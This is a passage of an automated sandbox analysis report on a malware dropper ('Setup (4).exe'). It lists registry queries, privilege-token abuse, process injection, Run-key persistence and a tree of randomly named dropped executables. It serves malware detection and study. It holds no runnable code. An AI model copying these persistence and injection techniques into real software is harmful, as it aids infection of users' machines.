\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe -
Enumerates system info in registry 2 TTPs 24 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 2 IoCs
pid Process 5428 taskkill.exe 2060 taskkill.exe -
Modifies data under HKEY_USERS 40 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Process not Found -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5664 PING.EXE -
Script User-Agent 10 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 234 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 239 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 85 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 92 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 229 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 256 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 283 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 71 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 73 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 88 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3444 Setup (4).exe 3444 Setup (4).exe 1564 B7WfuuZSoR13KQCCucqxjVZN.exe 1564 B7WfuuZSoR13KQCCucqxjVZN.exe 1424 WerFault.exe 1424 WerFault.exe 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 2380 WerFault.exe 2380 WerFault.exe 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 2740 WerFault.exe 3132 Process not Found 3132 Process not Found 2740 WerFault.exe 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3132 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1564 B7WfuuZSoR13KQCCucqxjVZN.exe 5544 BmG2DQfIMoE6pybE9bVYwjhf.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 5316 1322028.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4736 4AUn3qVoixfOGekao_r0NAwL.exe Token: SeRestorePrivilege 1424 WerFault.exe Token: SeBackupPrivilege 1424 WerFault.exe Token: SeBackupPrivilege 1424 WerFault.exe Token: SeDebugPrivilege 4412 GgTQxtl3PTEZ6PgzZcNkECEA.exe Token: SeDebugPrivilege 1556 WerFault.exe Token: SeDebugPrivilege 3252 6982593.exe Token: SeDebugPrivilege 2396 PmTP4Y8Tuo4gwoc1en2P5_xO.exe Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeDebugPrivilege 2144 5978978.exe Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeDebugPrivilege 3664 YqohxejQlzsSn85h6wVwNmgs.exe Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeCreateTokenPrivilege 1128 askinstall53.exe Token: SeAssignPrimaryTokenPrivilege 1128 askinstall53.exe Token: SeLockMemoryPrivilege 1128 askinstall53.exe Token: SeIncreaseQuotaPrivilege 1128 askinstall53.exe Token: SeMachineAccountPrivilege 1128 askinstall53.exe Token: SeTcbPrivilege 1128 askinstall53.exe Token: SeSecurityPrivilege 1128 askinstall53.exe Token: SeTakeOwnershipPrivilege 1128 askinstall53.exe Token: SeLoadDriverPrivilege 1128 askinstall53.exe Token: SeSystemProfilePrivilege 1128 askinstall53.exe Token: SeSystemtimePrivilege 1128 askinstall53.exe Token: SeProfSingleProcessPrivilege 1128 askinstall53.exe -
Suspicious use of FindShellTrayWindow 41 IoCs
pid Process 1532 LJ8xS7eMHEfn5YzFm3EG4doJ.tmp 932 Cleaner Installation.exe 4648 Inlog.tmp 3236 VPN.tmp 3964 WEATHER Manager.tmp 6268 mpcmdrun.exe 6032 FONA0AWbmkXuPgsAljdsGTUp.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3444 wrote to memory of 2996 3444 Setup (4).exe 91 PID 3444 wrote to memory of 2996 3444 Setup (4).exe 91 PID 3444 wrote to memory of 2996 3444 Setup (4).exe 91 PID 3444 wrote to memory of 4736 3444 Setup (4).exe 90 PID 3444 wrote to memory of 4736 3444 Setup (4).exe 90 PID 3444 wrote to memory of 3036 3444 Setup (4).exe 94 PID 3444 wrote to memory of 3036 3444 Setup (4).exe 94 PID 3444 wrote to memory of 3036 3444 Setup (4).exe 94 PID 3444 wrote to memory of 4412 3444 Setup (4).exe 93 PID 3444 wrote to memory of 4412 3444 Setup (4).exe 93 PID 3444 wrote to memory of 4412 3444 Setup (4).exe 93 PID 3444 wrote to memory of 4768 3444 Setup (4).exe 92 PID 3444 wrote to memory of 4768 3444 Setup (4).exe 92 PID 3444 wrote to memory of 4768 3444 Setup (4).exe 92 PID 3444 wrote to memory of 1196 3444 Setup (4).exe 95 PID 3444 wrote to memory of 1196 3444 Setup (4).exe 95 PID 3444 wrote to memory of 1196 3444 Setup (4).exe 95 PID 3444 wrote to memory of 576 3444 Setup (4).exe 100 PID 3444 wrote to memory of 576 3444 Setup (4).exe 100 PID 3444 wrote to memory of 576 3444 Setup (4).exe 100 PID 3036 wrote to memory of 2352 3036 YqohxejQlzsSn85h6wVwNmgs.exe 102 PID 3036 wrote to memory of 2352 3036 YqohxejQlzsSn85h6wVwNmgs.exe 102 PID 3036 wrote to memory of 2352 3036 YqohxejQlzsSn85h6wVwNmgs.exe 102 PID 2996 wrote to memory of 2396 2996 PmTP4Y8Tuo4gwoc1en2P5_xO.exe 103 PID 2996 wrote to memory of 2396 2996 PmTP4Y8Tuo4gwoc1en2P5_xO.exe 103 PID 2996 wrote to memory of 2396 2996 PmTP4Y8Tuo4gwoc1en2P5_xO.exe 103 PID 576 wrote to memory of 2532 576 EM376mw_WWT6k_K2WmjB6Hlp.exe 131 PID 576 wrote to memory of 2532 576 EM376mw_WWT6k_K2WmjB6Hlp.exe 131 PID 576 wrote to memory of 2532 576 EM376mw_WWT6k_K2WmjB6Hlp.exe 131 PID 1196 wrote to memory of 1564 1196 B7WfuuZSoR13KQCCucqxjVZN.exe 106 PID 1196 wrote to memory of 1564 1196 B7WfuuZSoR13KQCCucqxjVZN.exe 106 PID 1196 wrote to memory of 1564 1196 B7WfuuZSoR13KQCCucqxjVZN.exe 106 PID 1196 wrote to memory of 1564 1196 B7WfuuZSoR13KQCCucqxjVZN.exe 106 PID 1196 wrote to memory of 1564 1196 B7WfuuZSoR13KQCCucqxjVZN.exe 106 PID 1196 wrote to memory of 1564 1196 B7WfuuZSoR13KQCCucqxjVZN.exe 106 PID 3080 wrote to memory of 4768 3080 WerFault.exe 92 PID 3080 wrote to memory of 4768 3080 WerFault.exe 92 PID 3444 wrote to memory of 1644 3444 Setup (4).exe 109 PID 3444 wrote to memory of 1644 3444 Setup (4).exe 109 PID 3444 wrote to memory of 1644 3444 Setup (4).exe 109 PID 4736 wrote to memory of 1556 4736 4AUn3qVoixfOGekao_r0NAwL.exe 110 PID 4736 wrote to memory of 1556 4736 4AUn3qVoixfOGekao_r0NAwL.exe 110 PID 1644 wrote to memory of 1532 1644 LJ8xS7eMHEfn5YzFm3EG4doJ.exe 111 PID 1644 wrote to memory of 1532 1644 LJ8xS7eMHEfn5YzFm3EG4doJ.exe 111 PID 1644 wrote to memory of 1532 1644 LJ8xS7eMHEfn5YzFm3EG4doJ.exe 111 PID 4736 wrote to memory of 5056 4736 4AUn3qVoixfOGekao_r0NAwL.exe 112 PID 4736 wrote to memory of 5056 4736 4AUn3qVoixfOGekao_r0NAwL.exe 112 PID 4736 wrote to memory of 5056 4736 4AUn3qVoixfOGekao_r0NAwL.exe 112 PID 4736 wrote to memory of 2144 4736 4AUn3qVoixfOGekao_r0NAwL.exe 115 PID 4736 wrote to memory of 2144 4736 4AUn3qVoixfOGekao_r0NAwL.exe 115 PID 4736 wrote to memory of 2144 4736 4AUn3qVoixfOGekao_r0NAwL.exe 115 PID 4736 wrote to memory of 3252 4736 4AUn3qVoixfOGekao_r0NAwL.exe 114 PID 4736 wrote to memory of 3252 4736 4AUn3qVoixfOGekao_r0NAwL.exe 114 PID 4736 wrote to memory of 3252 4736 4AUn3qVoixfOGekao_r0NAwL.exe 114 PID 2996 wrote to memory of 2396 2996 3522455.exe 103 PID 2996 wrote to memory of 2396 2996 3522455.exe 103 PID 2996 wrote to memory of 2396 2996 3522455.exe 103 PID 2996 wrote to memory of 2396 2996 3522455.exe 103 PID 2996 wrote to memory of 2396 2996 3522455.exe 103 PID 3036 wrote to memory of 3664 3036 YqohxejQlzsSn85h6wVwNmgs.exe 116 PID 3036 wrote to memory of 3664 3036 YqohxejQlzsSn85h6wVwNmgs.exe 116 PID 3036 wrote to memory of 3664 3036 YqohxejQlzsSn85h6wVwNmgs.exe 116 PID 5056 wrote to memory of 664 5056 7566872.exe 117 PID 5056 wrote to memory of 664 5056 7566872.exe 117
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (4).exe"C:\Users\Admin\AppData\Local\Temp\Setup (4).exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Users\Admin\Documents\4AUn3qVoixfOGekao_r0NAwL.exe"C:\Users\Admin\Documents\4AUn3qVoixfOGekao_r0NAwL.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Users\Admin\AppData\Roaming\8988571.exe"C:\Users\Admin\AppData\Roaming\8988571.exe"3⤵
- Executes dropped EXE
PID:1556 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1556 -s 23044⤵
- Program crash
PID:5556
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1556 -s 23044⤵
- Program crash
PID:2148
-
-
-
C:\Users\Admin\AppData\Roaming\7566872.exe"C:\Users\Admin\AppData\Roaming\7566872.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:664
-
-
-
C:\Users\Admin\AppData\Roaming\6982593.exe"C:\Users\Admin\AppData\Roaming\6982593.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3252 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 20324⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6884
-
-
-
C:\Users\Admin\AppData\Roaming\5978978.exe"C:\Users\Admin\AppData\Roaming\5978978.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
-
C:\Users\Admin\Documents\PmTP4Y8Tuo4gwoc1en2P5_xO.exe"C:\Users\Admin\Documents\PmTP4Y8Tuo4gwoc1en2P5_xO.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Users\Admin\Documents\PmTP4Y8Tuo4gwoc1en2P5_xO.exeC:\Users\Admin\Documents\PmTP4Y8Tuo4gwoc1en2P5_xO.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
-
C:\Users\Admin\Documents\YyV4Yax0aIoKEERtyzGOKfqG.exe"C:\Users\Admin\Documents\YyV4Yax0aIoKEERtyzGOKfqG.exe"2⤵
- Executes dropped EXE
PID:4768 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4768 -s 3123⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1424 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6224
-
-
-
-
C:\Users\Admin\Documents\GgTQxtl3PTEZ6PgzZcNkECEA.exe"C:\Users\Admin\Documents\GgTQxtl3PTEZ6PgzZcNkECEA.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
C:\Users\Admin\Documents\YqohxejQlzsSn85h6wVwNmgs.exe"C:\Users\Admin\Documents\YqohxejQlzsSn85h6wVwNmgs.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Users\Admin\Documents\YqohxejQlzsSn85h6wVwNmgs.exeC:\Users\Admin\Documents\YqohxejQlzsSn85h6wVwNmgs.exe3⤵
- Executes dropped EXE
PID:2352
-
-
C:\Users\Admin\Documents\YqohxejQlzsSn85h6wVwNmgs.exeC:\Users\Admin\Documents\YqohxejQlzsSn85h6wVwNmgs.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3664
-
-
-
C:\Users\Admin\Documents\B7WfuuZSoR13KQCCucqxjVZN.exe"C:\Users\Admin\Documents\B7WfuuZSoR13KQCCucqxjVZN.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Users\Admin\Documents\B7WfuuZSoR13KQCCucqxjVZN.exe"C:\Users\Admin\Documents\B7WfuuZSoR13KQCCucqxjVZN.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1564
-
-
-
C:\Users\Admin\Documents\EM376mw_WWT6k_K2WmjB6Hlp.exe"C:\Users\Admin\Documents\EM376mw_WWT6k_K2WmjB6Hlp.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Users\Admin\Documents\EM376mw_WWT6k_K2WmjB6Hlp.exe"C:\Users\Admin\Documents\EM376mw_WWT6k_K2WmjB6Hlp.exe" -q3⤵PID:2532
-
-
-
C:\Users\Admin\Documents\LJ8xS7eMHEfn5YzFm3EG4doJ.exe"C:\Users\Admin\Documents\LJ8xS7eMHEfn5YzFm3EG4doJ.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\is-LMM4R.tmp\LJ8xS7eMHEfn5YzFm3EG4doJ.tmp"C:\Users\Admin\AppData\Local\Temp\is-LMM4R.tmp\LJ8xS7eMHEfn5YzFm3EG4doJ.tmp" /SL5="$F01EC,138429,56832,C:\Users\Admin\Documents\LJ8xS7eMHEfn5YzFm3EG4doJ.exe"3⤵
- Executes dropped EXE
